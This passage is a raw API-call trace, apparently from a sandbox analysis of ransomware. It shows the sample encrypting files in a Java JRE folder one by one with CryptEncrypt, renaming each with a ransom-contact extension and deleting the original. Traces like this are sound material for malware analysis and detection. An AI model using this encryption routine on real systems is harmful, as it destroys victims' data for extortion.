files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.469] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=51236) returned 1 [0153.469] CloseHandle (hObject=0x2dc) returned 1 [0153.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf")) returned 0x20 [0153.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.470] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.470] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.472] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac34b0) returned 1 [0153.472] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xc824, lpOverlapped=0x0) returned 1 [0153.474] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xc830, dwBufLen=0xc830 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xc830) returned 1 [0153.474] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc830, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xc830, lpOverlapped=0x0) returned 1 [0153.476] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac30b0) returned 1 [0153.476] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.476] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.476] CryptDestroyKey (hKey=0xac30b0) returned 1 [0153.476] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.476] CryptDestroyKey (hKey=0xac34b0) returned 1 [0153.476] CloseHandle (hObject=0x2dc) returned 1 [0153.476] CloseHandle (hObject=0x2f8) returned 1 [0153.477] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf")) returned 1 [0153.478] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.478] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=632) returned 1 [0153.478] CloseHandle (hObject=0x2f8) returned 1 [0153.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf")) returned 0x20 [0153.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.478] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.478] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.479] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac33f0) returned 1 [0153.479] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.479] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x278, lpOverlapped=0x0) returned 1 [0153.480] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x280, dwBufLen=0x280 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x280) returned 1 [0153.480] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x280, lpOverlapped=0x0) returned 1 [0153.481] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3330) returned 1 [0153.481] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.481] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0153.481] CryptDestroyKey (hKey=0xac3330) returned 1 [0153.481] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0153.481] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.481] CloseHandle (hObject=0x2f8) returned 1 [0153.481] CloseHandle (hObject=0x2dc) returned 1 [0153.481] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf")) returned 1 [0153.482] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.483] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1044) returned 1 [0153.483] CloseHandle (hObject=0x2dc) returned 1 [0153.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf")) returned 0x20 [0153.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.488] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.488] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.488] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2db0) returned 1 [0153.489] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.489] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x414, lpOverlapped=0x0) returned 1 [0153.490] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x420, dwBufLen=0x420 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x420) returned 1 [0153.490] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x420, lpOverlapped=0x0) returned 1 [0153.491] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0153.491] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.491] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.491] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.491] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.491] CryptDestroyKey (hKey=0xac2db0) returned 1 [0153.491] CloseHandle (hObject=0x2dc) returned 1 [0153.492] CloseHandle (hObject=0x2f8) returned 1 [0153.492] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf")) returned 1 [0153.493] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.493] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=274474) returned 1 [0153.493] CloseHandle (hObject=0x2f8) returned 1 [0153.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf")) returned 0x20 [0153.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.493] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.493] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.494] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac33f0) returned 1 [0153.494] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4302a, lpOverlapped=0x0) returned 1 [0153.610] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x43030, dwBufLen=0x43030 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x43030) returned 1 [0153.610] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x43030, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x43030, lpOverlapped=0x0) returned 1 [0153.616] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32f0) returned 1 [0153.616] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.616] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0153.616] CryptDestroyKey (hKey=0xac32f0) returned 1 [0153.616] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0153.616] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.616] CloseHandle (hObject=0x2f8) returned 1 [0153.616] CloseHandle (hObject=0x2dc) returned 1 [0153.617] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf")) returned 1 [0153.620] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.620] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.620] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=4122) returned 1 [0153.620] CloseHandle (hObject=0x2dc) returned 1 [0153.620] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data")) returned 0x20 [0153.621] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.621] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.621] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.621] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac32b0) returned 1 [0153.621] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.621] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x101a, lpOverlapped=0x0) returned 1 [0153.623] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x1020, dwBufLen=0x1020 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x1020) returned 1 [0153.623] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x1020, lpOverlapped=0x0) returned 1 [0153.624] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2f70) returned 1 [0153.624] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.624] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.624] CryptDestroyKey (hKey=0xac2f70) returned 1 [0153.624] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.624] CryptDestroyKey (hKey=0xac32b0) returned 1 [0153.624] CloseHandle (hObject=0x2dc) returned 1 [0153.624] CloseHandle (hObject=0x2f8) returned 1 [0153.624] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data")) returned 1 [0153.625] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.627] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=14156) returned 1 [0153.627] CloseHandle (hObject=0x2f8) returned 1 [0153.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip")) returned 0x20 [0153.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.627] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.627] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.628] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac32f0) returned 1 [0153.628] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.628] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x374c, lpOverlapped=0x0) returned 1 [0153.630] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x3750, dwBufLen=0x3750 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x3750) returned 1 [0153.630] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x3750, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x3750, lpOverlapped=0x0) returned 1 [0153.631] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3370) returned 1 [0153.631] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 